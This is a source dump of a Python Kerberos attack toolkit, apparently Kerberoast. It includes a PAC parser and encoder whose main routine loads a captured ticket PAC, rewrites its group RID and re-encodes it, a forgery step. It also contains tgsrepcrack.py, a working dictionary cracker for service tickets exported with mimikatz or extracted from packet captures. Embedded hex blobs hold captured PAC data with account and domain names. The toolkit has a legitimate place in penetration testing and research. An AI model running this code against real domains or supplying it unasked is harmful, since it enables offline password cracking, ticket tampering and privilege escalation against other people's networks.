190 | 		self.Version, self.ByteOrder, self.HeaderLen = struct.unpack('<BBH', self.Data[0:4])
191 | 		self.FillBytes = self.Data[4:8]
192 | 		self.InitialLength = struct.unpack('<Q', self.Data[8:16])[0]
193 | 
194 | 
195 | 		#self.ReferentD = self.Data[16:20]
196 | 
197 | 		self.LogonTime = BytesToTime(self.Data[20:28])
198 | 		#print 'Logon Time: %s' % PrettyTime(self.LogonTime)
199 | 		self.LogoffTime = BytesToTime(self.Data[28:36])
200 | 		#print 'Logoff Time: %s' % PrettyTime(self.LogoffTime)
201 | 		self.KickoffTime = BytesToTime(self.Data[36:44])
202 | 		#print 'Kickoff Time: %s' % PrettyTime(self.KickoffTime)
203 | 		self.PwdLastSet = BytesToTime(self.Data[44:52])
204 | 		#print 'PwdLastSet Time: %s' % PrettyTime(self.PwdLastSet)
205 | 		self.PwdCanChange = BytesToTime(self.Data[52:60])
206 | 		#print 'PwdCanChange Time: %s' % PrettyTime(self.PwdCanChange)
207 | 		self.PwdMustChange = BytesToTime(self.Data[60:68])
208 | 		#print 'PwdMustChange Time: %s' % PrettyTime(self.PwdMustChange)
209 | 
210 | 		accountnameref = self.Referent(self.Data[68:76])
211 | 		# print 'accountnameref %s' % accountnameref
212 | 		fullnameref = self.Referent(self.Data[76:84])
213 | 		#print fullnameref
214 | 		logonscriptref = self.Referent(self.Data[84:92])
215 | 		#print logonscriptref
216 | 		profilepathref = self.Referent(self.Data[92:100])
217 | 		#print profilepathref
218 | 		homedirref = self.Referent(self.Data[100:108])
219 | 		#print homedirref
220 | 		dirdriveref = self.Referent(self.Data[108:116])
221 | 		#print dirdriveref
222 | 		self.Logoncount, self.BadpPasswordCount, self.UserRid, self.GroupRid, numrids = struct.unpack('<HHLLL', self.Data[116:132]) #[0]
223 | 
224 | 		DATAOFFSET = 236
225 | 
226 | 		# TODO: Decode and re-encode this
227 | 		self.extrajunk = self.Data[132:DATAOFFSET]
228 | 
229 | 					
230 | 		offset = DATAOFFSET # points to first data item
231 | 		offset += 4 * 3 # max count, offset, actual count
232 | 		self.AccountName = self.Data[offset:offset+accountnameref.Length]#.decode('utf-8')
233 | 		#print '%i %s' % (offset, self.AccountName)
234 | 		offset += accountnameref.Length + accountnameref.PaddLen
235 | 
236 | 		offset += 4 * 3 # max count, offset, actual count
237 | 		self.DisplayName = self.Data[offset:offset+fullnameref.Length]#.decode('utf-8')
238 | 		#print '%i %s' % (offset, self.DisplayName)
239 | 		offset += fullnameref.Length + fullnameref.PaddLen
240 | 
241 | 		offset += 4 * 3 # max count, offset, actual count
242 | 		self.LogonScript = self.Data[offset:offset+logonscriptref.Length]
243 | 		#print '%i %s' % (offset, self.LogonScript)
244 | 		offset += logonscriptref.Length + logonscriptref.PaddLen
245 | 
246 | 		offset += 4 * 3 # max count, offset, actual count
247 | 		self.ProfilePath = self.Data[offset:offset+profilepathref.Length]
248 | 		#print '%i %s' % (offset, self.ProfilePath)
249 | 		offset += profilepathref.Length + logonscriptref.PaddLen
250 | 
251 | 		offset += 4 * 3 # max count, offset, actual count
252 | 		self.HomeDir = self.Data[offset:offset+homedirref.Length]
253 | 		#print '%i %s' % (offset, self.HomeDir)
254 | 		offset += homedirref.Length + homedirref.PaddLen
255 | 
256 | 		offset += 4 * 3 # max count, offset, actual count
257 | 		self.DirDrive = self.Data[offset:offset+dirdriveref.Length]
258 | 		#print '%i %s' % (offset, self.DirDrive)
259 | 		offset += homedirref.Length + dirdriveref.PaddLen
260 | 
261 | 
262 | 		#outtest = self.AccountName
263 | 		#print '!!!! AN Length: %i  --%s--  %s' % (len(outtest), outtest, outtest.encode('hex'))
264 | 
265 | 		#outtest = self.DisplayName #fullname
266 | 		#print '!!!! FN Length: %i  --%s--  %s' % (len(outtest), outtest, outtest.encode('hex'))
267 | 
268 | 		#outtest = self.LogonScript
269 | 		#print '!!!! LS Length: %i  --%s--  %s' % (len(outtest), outtest, outtest.encode('hex'))
270 | 
271 | 		#outtest = self.ProfilePath
272 | 		#print '!!!! PP Length: %i  --%s--  %s' % (len(outtest), outtest, outtest.encode('hex'))
273 | 
274 | 		#outtest = self.HomeDir
275 | 		#print '!!!! HD Length: %i  --%s--  %s' % (len(outtest), outtest, outtest.encode('hex'))
276 | 
277 | 		#outtest = self.DirDrive
278 | 		#print '!!!! DD Length: %i  --%s--  %s' % (len(outtest), outtest, outtest.encode('hex'))
279 | 
280 | 		maxridcount = struct.unpack('<L', self.Data[offset:offset+4])[0]
281 | 		#print 'maxrid', maxridcount
282 | 		offset += 4
283 | 		grouprids = []
284 | 		for i in range(numrids):
285 | 			#print self.Data[offset:offset+12].encode('hex')
286 | 			grouprids.append(struct.unpack('<L', self.Data[offset:offset+4])[0])
287 | 			offset += 8
288 | 
289 | 		self.Groups = grouprids
290 | 
291 | 		# TODO: Decode and re-encode this
292 | 		self.extrajunk2 = self.Data[offset:]
293 | 
294 | 
295 | 	def encode(self):
296 | 		header = struct.pack('<BBH', self.Version, self.ByteOrder, self.HeaderLen) + \
297 | 			self.FillBytes 
298 | 		#	struct.pack('<QL', self.InitialLength,
299 | 
300 | 		e = struct.pack('<L', 0x00020000) + \
301 | 			TimeToBytes(self.LogonTime) + \
302 | 			TimeToBytes(self.LogoffTime) + \
303 | 			TimeToBytes(self.KickoffTime) + \
304 | 			TimeToBytes(self.PwdLastSet) + \
305 | 			TimeToBytes(self.PwdCanChange) + \
306 | 			TimeToBytes(self.PwdMustChange) + \
307 | 			struct.pack('<HHL', len(self.AccountName), len(self.AccountName), 0x00020004) + \
308 | 			struct.pack('<HHL', len(self.DisplayName), len(self.DisplayName), 0x00020008) + \
309 | 			struct.pack('<HHL', len(self.LogonScript), len(self.LogonScript), 0x0002000c) + \
310 | 			struct.pack('<HHL', len(self.ProfilePath), len(self.ProfilePath), 0x00020010) + \
311 | 			struct.pack('<HHL', len(self.HomeDir),     len(self.HomeDir),     0x00020014) + \
312 | 			struct.pack('<HHL', len(self.DirDrive),    len(self.DirDrive),    0x00020018) + \
313 | 			struct.pack('<HHLLL', self.Logoncount, self.BadpPasswordCount, self.UserRid, self.GroupRid, len(self.Groups))
314 | 		
315 | 		# TODO: Decode and re-encode this
316 | 		e += self.extrajunk
317 | 
318 | 		e +=struct.pack('<LLL', int(len(self.AccountName)/2), 0, int(len(self.AccountName)/2)) + AlignedString(self.AccountName) + \
319 | 			struct.pack('<LLL', int(len(self.DisplayName)/2), 0, int(len(self.DisplayName)/2)) + AlignedString(self.DisplayName) + \
320 | 			struct.pack('<LLL', int(len(self.LogonScript)/2), 0, int(len(self.LogonScript)/2)) + AlignedString(self.LogonScript) + \
321 | 			struct.pack('<LLL', int(len(self.ProfilePath)/2), 0, int(len(self.ProfilePath)/2)) + AlignedString(self.ProfilePath) + \
322 | 			struct.pack('<LLL', int(len(self.HomeDir)/2),     0, int(len(self.HomeDir)/2))     + AlignedString(self.HomeDir)     + \
323 | 			struct.pack('<LLL', int(len(self.DirDrive)/2),    0, int(len(self.DirDrive)/2))    + AlignedString(self.DirDrive)
324 | 
325 | 		# Groups
326 | 		e += struct.pack('<L', len(self.Groups))
327 | 		for g in self.Groups:
328 | 			e += struct.pack('<LL', g, 7)
329 | 
330 | 		# TODO: Decode and re-encode this
331 | 		e += self.extrajunk2
332 | 
333 | 		header += struct.pack('<Q', len(e))
334 | 
335 | 		#print 'LogInInfoLen %i' % len(e)
336 | 
337 | 		#e += struct.pack('<LLL', len(self.AccountName), 0, len(self.AccountName)) #+ AlignedString(self.AccountName)
338 | 
339 | 		return header + e
340 | 
341 | class PacClientInfo(PacInfoStructure):
342 | 	Type = 10
343 | 	PrettyName = 'Client Info'
344 | 	ClientID = None
345 | 	Name = None
346 | 
347 | 	def __init__(self, pac, index=0):
348 | 		super(self.__class__, self).__init__(pac, index)
349 | 		if self.Type != 10:
350 | 			raise ValueError('PAC Information Structure is not Client Info')
351 | 
352 | 		self.ClientID = BytesToTime(self.Data[:8])
353 | 		namelen = struct.unpack('<H', self.Data[8:10])[0]
354 | 		self.Name = self.Data[10:10+namelen].decode('utf-8')
355 | 
356 | 
357 | 	def __str__(self):
358 | 		return '%s (%i) ClientID: %s  Name (%i): %s' % (self.PrettyName, self.Type, str(self.ClientID), len(self.Name), self.Name)
359 | 
360 | 	def encode(self):			
361 | 		return TimeToBytes(self.ClientID) + struct.pack('<H', len(self.Name)) + bytearray(self.Name,"utf-8")
362 | 
363 | class PacUpnDnsInfo(PacInfoStructure):
364 | 	Type = 12
365 | 	PrettyName = 'UPN DNS Info'
366 | 	UPNName = None
367 | 	DNSName = None
368 | 	Flags = None
369 | 
370 | 	def __init__(self, pac, index=0):
371 | 		super(self.__class__, self).__init__(pac, index)
372 | 		if self.Type != 12:
373 | 			raise ValueError('PAC Information Structure is not UPN DNS Info')
374 | 		upnlen = struct.unpack('<H', self.Data[:2])[0]
375 | 		upnoffset = struct.unpack('<H', self.Data[2:4])[0]
376 | 		dnslen = struct.unpack('<H', self.Data[4:6])[0]
377 | 		dnsoffset = struct.unpack('<H', self.Data[6:8])[0]
378 | 		self.Flags = self.Data[8:12] # screw decoding this
379 | 
380 | 		#print upnlen, upnoffset, dnslen, dnsoffset
381 | 
382 | 		self.UPNName = self.Data[upnoffset:upnoffset+upnlen].decode('utf-8')
383 | 		self.DNSName = self.Data[dnsoffset:dnsoffset+dnslen].decode('utf-8')
384 | 
385 | 	def __str__(self):
386 | 		return '%s (%i) Flags: %s  UPN Name: %s  DNS Name: %s' % (self.PrettyName, self.Type, '%0.8X' % struct.unpack('<L', self.Flags)[0], self.UPNName, self.DNSName)
387 | 
388 | 	def encode(self):
389 | 		# seems to add lots of \x00\x00\x00\x00 at the end of strings
390 | 		return struct.pack('<HHHH', \
391 | 			# UPN Len \
392 | 			len(self.UPNName), \
393 | 			# UPN Offset \
394 | 			16, \
395 | 			# DNS Len \
396 | 			len(self.DNSName), \
397 | 			# DNS Offset \
398 | 			20+len(AlignedString(self.UPNName))) + \
399 | 			self.Flags + b'\x00\x00\x00\x00' + AlignedString(self.UPNName) + b'\x00\x00\x00\x00' + AlignedString(self.DNSName)
400 | 
401 | class PacServerChecksum(PacInfoStructure):
402 | 	Type = 6
403 | 	PrettyName = 'Server Checksum'
404 | 	SigType = None
405 | 	SigVal = None
406 | 
407 | 	def __init__(self, pac, index=0):
408 | 		super(self.__class__, self).__init__(pac, index)
409 | 		if self.Type != 6:
410 | 			raise ValueError('PAC Information Structure is not Server Checksum')
411 | 		self.SigType = struct.unpack('<l', self.Data[:4])[0]
412 | 		self.SigVal = self.Data[4:]
413 | 
414 | 	def __str__(self):
415 | 		return '%s (%i) Size: %i  Sig Type: %i  SigVal: %s' % (self.PrettyName, self.Type, len(self.encode()), self.SigType, self.SigVal.hex())
416 | 
417 | 	def encode(self):
418 | 		#return self.Data
419 | 		return struct.pack('<l', self.SigType) + self.SigVal
420 | 
421 | class PacKdcChecksum(PacInfoStructure):
422 | 	Type = 7
423 | 	PrettyName = 'Privsvr Checksum'
424 | 	SigType = None
425 | 	SigVal = None
426 | 
427 | 	def __init__(self, pac, index=0):
428 | 		super(self.__class__, self).__init__(pac, index)
429 | 		if self.Type != 7:
430 | 			raise ValueError('PAC Information Structure is not KDC (Privsvr) Checksum')
431 | 		self.SigType = struct.unpack('<l', self.Data[:4])[0]
432 | 		self.SigVal = self.Data[4:]
433 | 
434 | 	def __str__(self):
435 | 		return '%s (%i) Size: %i  Sig Type: %i  SigVal: %s' % (self.PrettyName, self.Type, len(self.encode()), self.SigType, self.SigVal.hex())
436 | 
437 | 	def encode(self):
438 | 		#return self.Data
439 | 		return struct.pack('<l', self.SigType) + self.SigVal
440 | 
441 | class PacGenericInfo(PacInfoStructure):
442 | 	# Just in case there are other structures besides the original 5
443 | 	Type = None
444 | 
445 | 	def __init__(self, pac, index=0):
446 | 		super(self.__class__, self).__init__(pac, index)
447 | 
448 | 	def encode(self):
449 | 		#return self.Data
450 | 		super(self.__class__, self).__init__()
451 | 
452 | 
453 | class PAC(object):
454 | 	_pac=None
455 | 	_loaded = False
456 | 	Version = 0
457 | 
458 | 	PacLoginInfo = None
459 | 	PacClientInfo = None
460 | 	PacUpnDnsInfo = None
461 | 	PacServerChecksum = None
462 | 	PacKdcChecksum = None
463 | 
464 | 	def __init__(self, pac=None):
465 | 
466 | 		if pac == None:
467 | 			_pac = None
468 | 			_loaded = False
469 | 		else:
470 | 			self.load(pac)
471 | 
472 | 	def __str__(self):
473 | 		retval  = str(self.PacLoginInfo)
474 | 		retval += str(self.PacClientInfo)
475 | 		retval += str(self.PacUpnDnsInfo)
476 | 		retval += str(self.PacServerChecksum)
477 | 		retval += str(self.PacKdcChecksum)
478 | 		return retval
479 | 
480 | 	def load(self, pac):
481 | 		numentries, self.Version = struct.unpack('<II', pac[:8])
482 | 
483 | 		#pacinfostructures = {}
484 | 		pacinfostructures = collections.defaultdict(lambda: PacGenericInfo)
485 | 		for cls in PacInfoStructure.__subclasses__():
486 | 			pacinfostructures[cls.Type] = cls
487 | 
488 | 
489 | 		for i in range(numentries):
490 | 			# 8 - num entries (4) and version (4)
491 | 			offset = 8 + 16 * i
492 | 			# get the type of the chunk
493 | 			typeval = struct.unpack('<L', pac[offset:offset+4])[0]
494 | 			# load the right class
495 | 			cls = pacinfostructures[typeval]
496 | 			pis = cls(pac, i)
497 | 
498 | 			if pis.Type == 1:
499 | 				self.PacLoginInfo = pis
500 | 			elif pis.Type == 10:
501 | 				self.PacClientInfo = pis
502 | 			elif pis.Type == 12:
503 | 				self.PacUpnDnsInfo = pis
504 | 			elif pis.Type == 6:
505 | 				self.PacServerChecksum = pis
506 | 			elif pis.Type == 7:
507 | 				self.PacKdcChecksum = pis
508 | 
509 | 			if pis.Data != pis.encode():
510 | 				print("NO MATCH!! %s" % pis.PrettyName)
511 | 
512 | 				cmp(pis.Data, pis.encode(), verbose=True)
513 | 				#print '%s\n%s' % (pis.Data.encode('hex'), pis.encode().encode('hex'))
514 | 				print('----')
515 | 
516 | 
517 | 	def encode(self):
518 | 		e = struct.pack('<LL', 5, self.Version)
519 | 
520 | 		# the inital offset value is always 88
521 | 		# ok, so I lied. it is actually the sum of a bunch of crap that doesn't seem to change
522 | 		offset = 88
523 | 		alignedoffset = 88
524 | 
525 | 		headers = b''
526 | 		payload = b''
527 | 
528 | 		pacstructs = [self.PacLoginInfo, self.PacClientInfo, self.PacUpnDnsInfo, self.PacServerChecksum, self.PacKdcChecksum]
529 | 
530 | 		for ps in pacstructs:
531 | 			pse = ps.encode()
532 | 			psealigned = AlignedString(pse, 8)
533 | 
534 | 			headers += struct.pack('<IIII', ps.Type, len(pse), offset, 0)
535 | 			payload += psealigned
536 | 
537 | 			#print '%16s Offset: %3s  Aligned Offset: %3s  Length: %3s  Aligned Length: %3s' % (ps.PrettyName, offset, alignedoffset, len(psed), len(AlignedString(psed, 8)))
538 | 
539 | 			offset += len(psealigned)
540 | 
541 | 		return e + headers + payload
542 | 
543 | 
544 | 
545 | def cmp(s1, s2, comparelen=None, verbose=False):
546 | 	if not comparelen:
547 | 		if len(s1) <= len(s2):
548 | 			comparelen = len(s1)
549 | 		else:
550 | 			comparelen = len(s2)
551 | 
552 | 	if s1[:comparelen] == s2[:comparelen]:
553 | 		if verbose:
554 | 			print('SAME %i %i' % (len(s1), len(s2)))
555 | 		return True
556 | 	else:
557 | 		if verbose:
558 | 			print('NOT SAME')
559 | 			print(s1[:comparelen].encode('hex'))
560 | 			print()
561 | 			print(s2[:comparelen].encode('hex'))
562 | 		return False
563 | 
564 | 
565 | 
566 | def main():
567 | 	#a ='050000000000000001000000b001000058000000000000000a0000000e00000008020000000000000c000000480000001802000000000000060000001400000060020000000000000700000014000000780200000000000001100800cccccccca001000000000000000002005ee808c4fecdcf01ffffffffffffff7fffffffffffffff7f1ac0dc109ec6cf011a80463b67c7cf01ffffffffffffff7f04000400040002000400040008000200000000000c000200000000001000020000000000140002000000000018000200b30000005204000000020000010000001c000200200000000000000000000000000000000000000008000a00200002000a000c00240002002800020000000000000000001002000000000000000000000000000000000000000000000000000000000000010000002c00020000000000000000000000000002000000000000000200000074006d0002000000000000000200000074006d0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000200000700000005000000000000000400000044004300300031000600000000000000050000004d004500440049004e00000004000000010400000000000515000000bffab31eb43b681af8cdadb10100000030000200070000000100000001010000000000120100000000000000800eafcefecdcf01040074006d0000001c00100016003000010000000000000074006d0040006d006500640069006e002e006c006f00630061006c00000000004d004500440049004e002e004c004f00430041004c00000076ffffffce1884addcbeade3e2eb24d9920a294f0000000076ffffff6cb8692b47afb295b541b4fe9a0a058c00000000'
568 | 
569 | 	# xp-success
570 | 	#a = '050000000000000001000000a801000058000000000000000a0000000e00000000020000000000000c000000480000001002000000000000060000001400000058020000000000000700000014000000700200000000000001100800cccccccc9801000000000000000002006cd0e2cf07afce01ffffffffffffff7fffffffffffffff7f6595bf65d875ce0165552990a176ce01ffffffffffffff7f04000400040002000000000008000200000000000c000200000000001000020000000000140002000000000018000200460000005204000001020000010000001c000200200000000000000000000000000000000000000008000a00200002000a000c00240002002800020000000000000000001002000000000000000000000000000000000000000000000000000000000000010000002c00020000000000000000000000000002000000000000000200000074006d0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000010200000700000005000000000000000400000044004300300031000600000000000000050000004d004500440049004e00000004000000010400000000000515000000bffab31eb43b681af8cdadb10100000030000200070000000100000001010000000000120100000080dc05d007afce01040074006d0000001c00100016003000010000000000000074006d0040006d006500640069006e002e006c006f00630061006c00000000004d004500440049004e002e004c004f00430041004c00000076ffffffd0293d55a40ae227b4826d87f5f3806b0000000076ffffffb7b53a4ac414e436a7e58845f5e419c000000000'
571 | 
572 | 	# 7-success
573 | 	#a = '050000000000000001000000b001000058000000000000000a0000000e00000008020000000000000c000000480000001802000000000000060000001400000060020000000000000700000014000000780200000000000001100800cccccccca00100000000000000000200c605fb3210d5cf01ffffffffffffff7fffffffffffffff7f1ac0dc109ec6cf011a80463b67c7cf01ffffffffffffff7f04000400040002000400040008000200000000000c000200000000001000020000000000140002000000000018000200c20000005204000001020000010000001c000200200000000000000000000000000000000000000008000a00200002000a000c00240002002800020000000000000000001002000000000000000000000000000000000000000000000000000000000000010000002c00020000000000000000000000000002000000000000000200000074006d0002000000000000000200000074006d0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000010200000700000005000000000000000400000044004300300031000600000000000000050000004d004500440049004e00000004000000010400000000000515000000bffab31eb43b681af8cdadb1010000003000020007000000010000000101000000000012010000000000000080353e9110d5cf01040074006d0000001c00100016003000010000000000000074006d0040006d006500640069006e002e006c006f00630061006c00000000004d004500440049004e002e004c004f00430041004c00000076ffffff7383d9c6b5854086d8997b5ac7a632260000000076ffffff20bfc7689277658ad2c21fdc475d6c2300000000'
574 | 
575 | 	# 7-success-administrator
576 | 	#a = '0500000000000000010000003002000058000000000000000a0000002400000088020000000000000c00000060000000b002000000000000060000001400000010030000000000000700000014000000280300000000000001100800cccccccc2002000000000000000002008d5c003e13d5cf01ffffffffffffff7fffffffffffffff7f0f29e0c9d775ce010fe949f4a076ce01ffffffffffffff7f1a001a00040002001a001a0008000200000000000c00020000000000100002000000000014000200000000001800020078000000f401000001020000060000001c000200200200000000000000000000000000000000000008000a00200002000a000c00240002002800020000000000000000001002000000000000000000000000000000000000000000000000000000000000010000002c0002003400020001000000380002000d000000000000000d000000410064006d0069006e006900730074007200610074006f00720000000d000000000000000d000000410064006d0069006e006900730074007200610074006f00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000600000008020000070000000102000007000000000200000700000007020000070000000602000007000000650400000700000005000000000000000400000044004300300031000600000000000000050000004d004500440049004e00000004000000010400000000000515000000bffab31eb43b681af8cdadb10100000030000200070000000100000001010000000000120100000004000000010400000000000515000000bffab31eb43b681af8cdadb1010000003c0200000700002000000000808bb97613d5cf011a00410064006d0069006e006900730074007200610074006f0072000000000032001000160048000000000000000000410064006d0069006e006900730074007200610074006f00720040006d006500640069006e002e006c006f00630061006c000000000000004d004500440049004e002e004c004f00430041004c00000076ffffff84faca5fb556ef458c3200e64a3b96ca0000000076ffffff051fc3c03c92775ab3a24d24dc11a19700000000'
577 | 
578 | 	# ram
579 | 	a = '050000000000000001000000b001000058000000000000000a0000000e00000008020000000000000c000000480000001802000000000000060000001400000060020000000000000700000014000000780200000000000001100800cccccccca001000000000000000002005ee808c4fecdcf01ffffffffffffff7fffffffffffffff7f1ac0dc109ec6cf011a80463b67c7cf01ffffffffffffff7f04000400040002000400040008000200000000000c000200000000001000020000000000140002000000000018000200b30000005204000001020000010000001c000200200000000000000000000000000000000000000008000a00200002000a000c00240002002800020000000000000000001002000000000000000000000000000000000000000000000000000000000000010000002c00020000000000000000000000000002000000000000000200000074006d0002000000000000000200000074006d0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000010200000700000005000000000000000400000044004300300031000600000000000000050000004d004500440049004e00000004000000010400000000000515000000bffab31eb43b681af8cdadb10100000030000200070000000100000001010000000000120100000000000000800eafcefecdcf01040074006d0000001c00100016003000010000000000000074006d0040006d006500640069006e002e006c006f00630061006c00000000004d004500440049004e002e004c004f00430041004c00000076ffffffce1884addcbeade3e2eb24d9920a294f0000000076ffffff6cb8692b47afb295b541b4fe9a0a058c00000000'
580 | 
581 | 	a = bytearray.fromhex(a)
582 | 
583 | 	p = PAC(pac=a)
584 | 	print(p.PacLoginInfo.GroupRid)
585 | 	p.PacLoginInfo.GroupRid = 77
586 | 	print(p.PacLoginInfo.GroupRid)
587 | 	#print p
588 | 
589 | 
590 | 	p2 = p.encode()
591 | 
592 | 	#cmp(a, p2, None, True)
593 | 
594 | 	print(a == p2)
595 | 
596 | 
597 | 
598 | 
599 | 
600 | if __name__ == '__main__':
601 | 	main()
602 | 
603 | 
604 | 


--------------------------------------------------------------------------------
/tgsrepcrack.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3 -tt
 2 | 
 3 | import kerberos
 4 | from pyasn1.codec.ber import encoder, decoder
 5 | import glob
 6 | 
 7 | def crack(wordlist, enctickets):
 8 | 	toremove = []
 9 | 	while enctickets:
10 | 		word = wordlist.get()
11 | 		#print "trying %s" % word
12 | 		for et in enctickets:
13 | 			kdata, nonce = kerberos.decrypt(kerberos.ntlmhash(word), 2, et[0])
14 | 			if kdata:
15 | 				print('found password for ticket %i: %s  File: %s' % (et[1], word, et[2]))
16 | 				toremove.append(et)
17 | 		for et in toremove:
18 | 			try:
19 | 				enctickets.remove(et)
20 | 			except:
21 | 				return
22 | 			if not enctickets:
23 | 				return
24 | 
25 | print('''
26 | 
27 |     USE HASHCAT, IT'S HELLA FASTER!!
28 | 
29 | ''')
30 | 
31 | import argparse
32 | import sys
33 | 
34 | parser = argparse.ArgumentParser(description='Read kerberos ticket then modify it')
35 | parser.add_argument('wordlistfile', action='store',
36 | 				metavar='dictionary.txt', type=argparse.FileType('rb'), # windows closes it in thread
37 | 				help='the word list to use with password cracking')
38 | parser.add_argument('files', nargs='+', metavar='file.kirbi', type=str,
39 | 				help='File name to crack. Use asterisk \'*\' for many files.\n Files are exported with mimikatz or from extracttgsrepfrompcap.py')
40 | 
41 | args = parser.parse_args()	
42 | 
43 | 
44 | # load the tickets
45 | enctickets = []
46 | i = 0
47 | for path in args.files:
48 | 	for filename in glob.glob(path):
49 | 		et = kerberos.extract_ticket_from_kirbi(filename)
50 | 		enctickets.append((et, i, filename))
51 | 
52 | if len(enctickets):
53 | 	print("Cracking %i tickets..." % len(enctickets))
54 | else:
55 | 	print("No tickets found")
56 | 	sys.exit()
57 | 
58 | # load wordlist
59 | for w in args.wordlistfile:
60 | 	word = w.decode('utf-8','ignore').strip()
61 | 	hash = kerberos.ntlmhash(word)
62 | 	for et in enctickets:
63 | 		kdata, nonce = kerberos.decrypt(hash, 2, et[0])
64 | 		if kdata:
65 | 			print('found password for ticket %i: %s  File: %s' % (et[1], word, et[2]))
66 | 			enctickets.remove(et)
67 | 			if len(enctickets) == 0:
68 | 				print('Successfully cracked all tickets')
69 | 				sys.exit()
70 | 
71 | if len(enctickets):
72 | 	print("Unable to crack %i tickets" % len(enctickets))
73 | 


--------------------------------------------------------------------------------